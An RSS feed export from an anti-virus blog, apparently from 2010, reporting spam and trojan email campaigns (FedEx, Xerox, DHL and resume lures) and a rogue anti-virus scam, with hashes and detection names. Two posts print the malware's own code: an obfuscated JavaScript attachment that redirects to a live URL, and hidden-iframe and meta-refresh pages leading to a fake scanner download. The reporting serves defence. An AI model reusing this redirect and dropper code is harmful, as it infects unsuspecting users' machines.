<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>mxlab - all about anti virus and anti spam</title>
	<atom:link href="http://blog.mxlab.eu/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.mxlab.eu</link>
	<description>mx lab blog - all about anti virus and anti spam</description>
	<lastBuildDate>Wed, 25 Aug 2010 14:39:01 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='blog.mxlab.eu' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://0.gravatar.com/blavatar/8be3c09044ac5968d17dadf3224891c4?s=96&#038;d=http://s2.wp.com/i/buttonw-com.png</url>
		<title>mxlab - all about anti virus and anti spam</title>
		<link>http://blog.mxlab.eu</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://blog.mxlab.eu/osd.xml" title="mxlab - all about anti virus and anti spam" />
	<atom:link rel='hub' href='http://blog.mxlab.eu/?pushpress=hub'/>
		<item>
		<title>Spam message inside a ZIP file</title>
		<link>http://blog.mxlab.eu/2010/08/25/spam-message-inside-a-zip-file/</link>
		<comments>http://blog.mxlab.eu/2010/08/25/spam-message-inside-a-zip-file/#comments</comments>
		<pubDate>Wed, 25 Aug 2010 14:37:32 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Spam]]></category>
		<category><![CDATA[canadian pharmacy]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1058</guid>
		<description><![CDATA[Spammer often use new techniques in order to deliver the message to the recipient without being catched by email security solutions. Today, one of such spam emails did caught our attention because of the original technique that has been used. The spam email had the subject &#8220;Your wife photos attached&#8221;, a very short body content [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1058&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Spammer often use new techniques in order to deliver the message to the recipient without being catched by email security solutions. Today, one of such spam emails did caught our attention because of the original technique that has been used.</p>
<p>The spam email had the subject &#8220;Your wife photos attached&#8221;, a very short body content &#8221; Your wife photos&#8221; and the attached file rooster.zip.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100825_rooster_2.jpg" alt="" width="450" height="125" /></p>
<p>At first, we thought this was some new email security treath so we investigated the ZIP archive. Once extracted the file rooster.jpg was available. The filename does not end with .exe or the combination of many spaces with at the end .exe so we opened the JPEG and got this spam advertisment for Viagra, Cialis and VPXL.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100825_rooster.jpg" alt="" width="335" height="320" /></p>
<p>The instructions, if you are interested, is to go to med242.ru which leads to the web site of the Canadian Pharmacy.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" alt="" width="450" height="418" /></p>
<p>I can understand that spammers try different techniques but this one is, in my humble opinion, not a very good one. What a hassle to read the message.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1058/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1058/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1058/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1058&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/25/spam-message-inside-a-zip-file/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100825_rooster_2.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100825_rooster.jpg" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100215_canadianpharmacy.jpg" medium="image" />
	</item>
		<item>
		<title>FedEx emails with new trojan variant</title>
		<link>http://blog.mxlab.eu/2010/08/25/fedex-emails-with-new-trojan-variant/</link>
		<comments>http://blog.mxlab.eu/2010/08/25/fedex-emails-with-new-trojan-variant/#comments</comments>
		<pubDate>Wed, 25 Aug 2010 14:17:51 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[FedEx trojan]]></category>
		<category><![CDATA[FedEx]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1054</guid>
		<description><![CDATA[MX Lab intercepted a new campaign of FedEx emails that have a trojan attached to the message. The email is sent from the spoofed address &#8221;Fedex Support, Trisha Kimble&#8221; &#60;kyeagl@fedex.com&#62; &#8211; please note that the name of the person can change. Possible subjects: Fedex Invoice Copy N25524750 Fedex Item Status N4347526 Fedex Shipment Status N0919106 Fedex [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1054&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted a new campaign of FedEx emails that have a trojan attached to the message. The email is sent from the spoofed address &#8221;Fedex Support, Trisha Kimble&#8221; &lt;kyeagl@fedex.com&gt; &#8211; please note that the name of the person can change.</p>
<p>Possible subjects:</p>
<p>Fedex Invoice Copy N25524750<br />
Fedex Item Status N4347526<br />
Fedex Shipment Status N0919106<br />
Fedex Tracking Number N7897143</p>
<p>The body of the email does not contains any text but only an embedded image.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100825_fedex.gif" alt="" width="450" height="218" /></p>
<p>The email has the attachment  FEDEXInvoiceEE438252OP.zip. The 36 kB large file FedexInvoice_EE776129.exe is extracted from the zip archive.</p>
<p>At the time of writing, only 8 of the 42 AV engines at Virus Total did detect the trojan. The trojan is known as W32/Agent.JBI (Authentium), Suspicious:W32/Malware!Gemini (F-Secure), TrojanDropper:Win32/Oficla.T (Microsoft), a variant of Win32/Kryptik.GHC (NOD32).</p>
<p>Virus Total <a href="http://www.virustotal.com/file-scan/report.html?id=49ff1168e5b26c69cf879747230257bec5292f7471ed2945055bbd2d54771838-1282723650" target="_blank">permlink</a> and MD5: 2587d5dc4b18e652532e556ac26f2290</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1054/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1054/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1054/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1054/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1054/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1054/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1054/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1054/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1054/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1054/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1054/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1054/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1054/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1054/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1054&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/25/fedex-emails-with-new-trojan-variant/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100825_fedex.gif" medium="image" />
	</item>
		<item>
		<title>New Oficla trojan version in emails with subject “Scan from a Xerox WorkCentre Pro”</title>
		<link>http://blog.mxlab.eu/2010/08/20/new-oficla-trojan-version-in-emails-with-subject-%e2%80%9cscan-from-a-xerox-workcentre-pro%e2%80%9d/</link>
		<comments>http://blog.mxlab.eu/2010/08/20/new-oficla-trojan-version-in-emails-with-subject-%e2%80%9cscan-from-a-xerox-workcentre-pro%e2%80%9d/#comments</comments>
		<pubDate>Thu, 19 Aug 2010 23:29:35 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[oficla]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1049</guid>
		<description><![CDATA[MX Lab intercepted some emails with the subject “Scan from a Xerox WorkCentre Pro N 6204257″ that contains the latest Oficla trojan variant. The emails are sent from a spoofed email address and contains a subject in one of the following formats: Scan from a Xerox WorkCentre Pro $6208924 Scan from a Xerox WorkCentre Pro [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1049&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepted some emails with the subject “Scan from a Xerox WorkCentre Pro N 6204257″ that contains the latest Oficla trojan variant. The emails are sent from a spoofed email address and contains a subject in one of the following formats:</p>
<p>Scan from a Xerox WorkCentre Pro $6208924<br />
Scan from a Xerox WorkCentre Pro #7943943<br />
Scan from a Xerox WorkCentre Pro N9700617</p>
<p>Body of the email:</p>
<blockquote><p>Please open the attached document.  It was scanned and sent to you using a Xerox<br />
WorkCentre Pro.</p>
<p>Sent by: Guest<br />
Number of Images: 1<br />
Attachment File Type: ZIP [DOC]</p>
<p>WorkCentre Pro Location: machine location not set<br />
Device Name: XRX6919AA7ACDB46116749</p>
<p>For more information on Xerox products and solutions, please visit</p>
<p>http://www.xerox.com</p></blockquote>
<p>The email contains a ZIP archive named Tax report.zip with the 56 kB large document Xerox_doc.exe inside.</p>
<p>Virus Total <a href="http://www.virustotal.com/file-scan/report.html?id=df36b54865cd71e5ad0799b303652c95ea3c75294e34c15f6d1c18d76e301e07-1282263355" target="_blank">permlink</a> and MD5: eadf133be4dc58050626a5fd194fc546.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1049/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1049/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1049/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1049/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1049/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1049/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1049/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1049/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1049/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1049/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1049/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1049/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1049/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1049/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1049&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/20/new-oficla-trojan-version-in-emails-with-subject-%e2%80%9cscan-from-a-xerox-workcentre-pro%e2%80%9d/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>
	</item>
		<item>
		<title>Analysis of rogue anti virus software</title>
		<link>http://blog.mxlab.eu/2010/08/20/analysis-of-rogue-anti-virus-software/</link>
		<comments>http://blog.mxlab.eu/2010/08/20/analysis-of-rogue-anti-virus-software/#comments</comments>
		<pubDate>Thu, 19 Aug 2010 23:16:54 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[rogue av]]></category>
		<category><![CDATA[antivirus_24.exe]]></category>
		<category><![CDATA[antivirus.exe]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1047</guid>
		<description><![CDATA[MX Lab reported earlier in some blog articles about the circulation of a malware campaign that leads to rogue anti virus software and further infections of your computer in the following articles: Resume emails with attached file Resume.html leads to rogue AV software Campaign with emails that lead to rogue AV software antivirus_24.exe continues Malicious [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1047&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab reported earlier in some blog articles about the circulation of a malware campaign that leads to rogue anti virus software and further infections of your computer in the following articles:</p>
<p><a href="http://blog.mxlab.eu/2010/08/19/resume-emails-with-attached-file-resume-html-leads-to-rogue-av-software/" target="_blank">Resume emails with attached file Resume.html leads to rogue AV software</a><br />
<a href="http://blog.mxlab.eu/2010/08/10/campaign-with-emails-that-lead-to-rogue-av-software-antivirus_24-exe-continues/" target="_blank">Campaign with emails that lead to rogue AV software antivirus_24.exe continues<br />
</a><a href="http://blog.mxlab.eu/2010/08/07/malicious-emails-lead-to-rogue-av-software-antivirus_24-exe/" target="_blank">Malicious emails lead to rogue AV software antivirus_24.exe</a></p>
<p>We just managed to get a real sample of the malware and a working web site that hosts the malicious scripts and fake anti virus screens. In a comment on one of our blog posts, a writer has delivered us the following URL hxxp://kidstylesource.com/x.html.</p>
<p>When we tried this one we got the iframe scripting that is used in this campaign:</p>
<pre>PLEASE WAITING 4 SECOND...
  &lt;meta http-equiv="refresh" content="4;
url=hxxp://cetogilco.cz.cc/scanner10/?afid=24"&gt;
&lt;/head&gt;&lt;body&gt;

&lt;iframe src="hxxp://protectionreader.in/media/index.php?
xml=back&amp;rnd=img&amp;nid=151&amp;hash=ecard&amp;c=4" style="visibility: hidden;" height="1" width="1"&gt;
&lt;/iframe&gt;

&lt;/body&gt;&lt;/html&gt;</pre>
<p>We soon got the following screen in our browser and a pop up window with the message that our system is infected. Oh, yes, we continue now to see what happens. Do not try this at home!</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100820_antivirus.gif" alt="" width="450" height="354" /></p>
<p>After clicking on OK we got a screen that starts scanning the computer system. The progress bar will advance very fast for such an anti virus scanner and the first alleged infections are found on your system.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100820_antivirus_2.gif" alt="" width="450" height="338" /></p>
<p>A new popup will appear with a Windows Security Alert when the scan is finished. When we click on the button Remove all we got the option to download the file 164 kB large file antivirus.exe.</p>
<p>When submitting this file to Virus Total, 19 of the 42 AV engines did detect the trojan with names like W32/Katusha.D.gen!Eldorado (Authentium), W32/Katusha.D.gen!Eldorado (F-Prot), Mal/FakeAV-EI (Sophos) or TROJ_FAKEAV.SMDO (Trend Micro).</p>
<p>Virus Total <a href="http://www.virustotal.com/file-scan/report.html?id=87a062c494269c64db22cc9e7e969f3f89c8f8dc571d6c166ccb933799519bd7-1282263346" target="_blank">permlink</a> and MD5: b9734f1148c03a7f90ad77cb81dc6f1d.</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1047/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1047/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1047/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1047/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1047/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1047/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1047/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1047/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1047/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1047/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1047/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1047/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1047/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1047/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1047&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/20/analysis-of-rogue-anti-virus-software/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100820_antivirus.gif" medium="image" />

		<media:content url="http://www.mxlab.eu/img_news/20100820_antivirus_2.gif" medium="image" />
	</item>
		<item>
		<title>Resume emails with attached file Resume.html leads to rogue AV software</title>
		<link>http://blog.mxlab.eu/2010/08/19/resume-emails-with-attached-file-resume-html-leads-to-rogue-av-software/</link>
		<comments>http://blog.mxlab.eu/2010/08/19/resume-emails-with-attached-file-resume-html-leads-to-rogue-av-software/#comments</comments>
		<pubDate>Thu, 19 Aug 2010 09:12:46 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Malware]]></category>
		<category><![CDATA[Viruses]]></category>
		<category><![CDATA[anti virus]]></category>
		<category><![CDATA[rogue av]]></category>
		<category><![CDATA[antivirus_24.exe]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1041</guid>
		<description><![CDATA[ <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1041&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>MX Lab intercepts emails with the subject Resume, an attached file Resume.html and a very short email body:</p>
<blockquote><p>Attached, please find</p></blockquote>
<p>The attached HTML file contains the following code:</p>
<div id="_mcePaste">&lt;SCRIPT LANGUAGE=&#8221;Javascript&#8221;&gt;&lt;!&#8211;</div>
<div id="_mcePaste">//</div>
<div id="_mcePaste">function xhtmldecode(x){</div>
<div id="_mcePaste">document.write(unescape(x))</div>
<div id="_mcePaste">}</div>
<div id="_mcePaste">function runit(){</div>
<div id="_mcePaste">x=&#8221;%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%</div>
<div>72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B</div>
<div>%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%72%74%2E%</div>
<div>6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A&#8221;</div>
<div id="_mcePaste">xhtmldecode(x)</div>
<div id="_mcePaste">}</div>
<div id="_mcePaste">runit()</div>
<div id="_mcePaste">//&#8211;&gt;</div>
<div id="_mcePaste">&lt;/script&gt;</div>
<p>&lt;SCRIPT LANGUAGE=&#8221;Javascript&#8221;&gt;&lt;!&#8211;//function xhtmldecode(x){document.write(unescape(x))}function runit(){x=&#8221;%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%<br />
3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%<br />
22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%69%6D%62%65%<br />
72%74%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A&#8221;<br />
xhtmldecode(x)}runit()//&#8211;&gt;&lt;/script&gt;</p>
<p>When opening the attached HTML file you are directed to a web site witht he following code:</p>
<pre>PLEASE WAITING 4 SECOND...
  &lt;<span class="start-tag">meta</span><span class="attribute-name"> http-equiv</span>=<span class="attribute-value">"refresh" </span><span class="attribute-name">content</span>=<span class="attribute-value">"4;
url=hxxp://brocuphdislock.cz.cc/scanner10/?afid=24"</span>&gt;
&lt;/<span class="end-tag">head</span>&gt;&lt;<span class="start-tag">body</span>&gt;

&lt;<span class="start-tag">iframe</span><span class="attribute-name"> src</span>="hxxp://cherrysolo.ru:8080/index.php?pid=10"
<span class="attribute-name">style</span>=<span class="attribute-value">"visibility: hidden;" </span><span class="attribute-name">height</span>=<span class="attribute-value">"1" </span><span class="attribute-name">width</span>=<span class="attribute-value">"1"</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;</pre>
<pre>&lt;/<span class="end-tag">body</span>&gt;&lt;/<span class="end-tag">html</span>&gt;</pre>
<p>After 4 seconds you will get redirected to hxxp://brocuphdislock.cz.cc/scanner10/?afid=24. On our Mac computer we got the following screen.</p>
<p><img class="alignnone" src="http://www.mxlab.eu/img_news/20100819_antivirus_24.gif" alt="" width="314" height="193" /></p>
<p>It stayed like this for quite a while so I guess that the scripting of this site doesn&#8217;t work too well on a Mac computer. At MX Lab, we believe that this is a new campaign to distribute the rogua anti virus software antivirus_24.exe as mentioned in earlier blog articles:</p>
<p><a href="http://blog.mxlab.eu/2010/08/10/campaign-with-emails-that-lead-to-rogue-av-software-antivirus_24-exe-continues/" target="_blank">Campaign with emails that lead to rogue AV software antivirus_24.exe continues</a><br />
<a href="http://blog.mxlab.eu/2010/08/07/malicious-emails-lead-to-rogue-av-software-antivirus_24-exe/" target="_blank"> Malicious emails lead to rogue AV software antivirus_24.exe</a></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/mxlab.wordpress.com/1041/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/mxlab.wordpress.com/1041/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/mxlab.wordpress.com/1041/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/mxlab.wordpress.com/1041/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/mxlab.wordpress.com/1041/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/mxlab.wordpress.com/1041/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/mxlab.wordpress.com/1041/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/mxlab.wordpress.com/1041/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/mxlab.wordpress.com/1041/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/mxlab.wordpress.com/1041/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/mxlab.wordpress.com/1041/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/mxlab.wordpress.com/1041/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/mxlab.wordpress.com/1041/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/mxlab.wordpress.com/1041/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1041&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://blog.mxlab.eu/2010/08/19/resume-emails-with-attached-file-resume-html-leads-to-rogue-av-software/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6751de05c9679f2f58d63d33207ef4f7?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">mxlab</media:title>
		</media:content>

		<media:content url="http://www.mxlab.eu/img_news/20100819_antivirus_24.gif" medium="image" />
	</item>
		<item>
		<title>DHL tracking emails are back with new trojan variants</title>
		<link>http://blog.mxlab.eu/2010/08/13/dhl-tracking-emails-are-back-with-new-trojan-variants/</link>
		<comments>http://blog.mxlab.eu/2010/08/13/dhl-tracking-emails-are-back-with-new-trojan-variants/#comments</comments>
		<pubDate>Fri, 13 Aug 2010 13:10:58 +0000</pubDate>
		<dc:creator>mxlab</dc:creator>
				<category><![CDATA[Viruses]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[DHL]]></category>

		<guid isPermaLink="false">http://blog.mxlab.eu/?p=1038</guid>
		<description><![CDATA[Since a few days, MX Lab is intercepting a new trojan variant in emails regarding a DHL delivery. The email coms from the spoofed address DHL Parcel Support &#60;help.id990@dhl.com&#62;. Common subjects are: DHL Delivery. Please get your parcel NR7883 DHL Delivery. Get your parcel NR7308 DHL Delivery. Get your parcel ID0290 DHL Delivery Service. Error in [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=blog.mxlab.eu&blog=574486&post=1038&subd=mxlab&ref=&feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Since a few days, MX Lab is intercepting a new trojan variant in emails regarding a DHL delivery. The email coms from the spoofed address DHL Parcel Support &lt;help.id990@dhl.com&gt;.</p>
<p>Common subjects are:</p>
<p>DHL Delivery. Please get your parcel NR7883<br />
DHL Delivery. Get your parcel NR7308<br />
DHL Delivery. Get your parcel ID0290<br />
DHL Delivery Service. Error in delivery address<br />
DHL International. Your Parcel Number 0066<br />
DHL Services. Get your parcel ID212<br />
DHL Servise. Parcel number 3005<br />
&#8230;.</p>
<p>The body of the email:</p>
<blockquote><p>Dear customer.</p>
<p>We were not able to deliver your package to your address!</p>
<p>Reason:&#8221; incorrect address &#8220;<br />
Please pick up your package in local DHL office.<br />
Scheduled Delivery: 21-August-2010</p>
<p>Attention!<br />
The post label is attached to this e-mail.<br />
We kindly ask you to print it and take it to the post office to pick up the package.</p>
<p>Thank you!</p></blockquote>
<p>The trojan is known as TROJ_OFICLA.AMG (TrendMicro), Trojan:Win32/Oficla.V (Microsoft), W32/Trojan3.BXP (F-Prot), Mal/EncPk-AX (Sophos), Trojan.Oficla.AC (BitDefender).</p>
<p>The attached ZIP file is approx. 44 kB large and is in the format of: Print_label_ID347a.zip. Once extracted, an .exe file is present from the archive.</p>
<p>Virus Total <a href="http://www.virustotal.com/file-scan/report.html?id=dda72c35f7cf889cca8e0eeb4b3ce22ee8fbe242f788d99ff10b9ba03c89e3fa-1281697827" target="_blank">permlink</a> and MD5: 5d16e73e05c8e03325e6971781b0af78.</p>
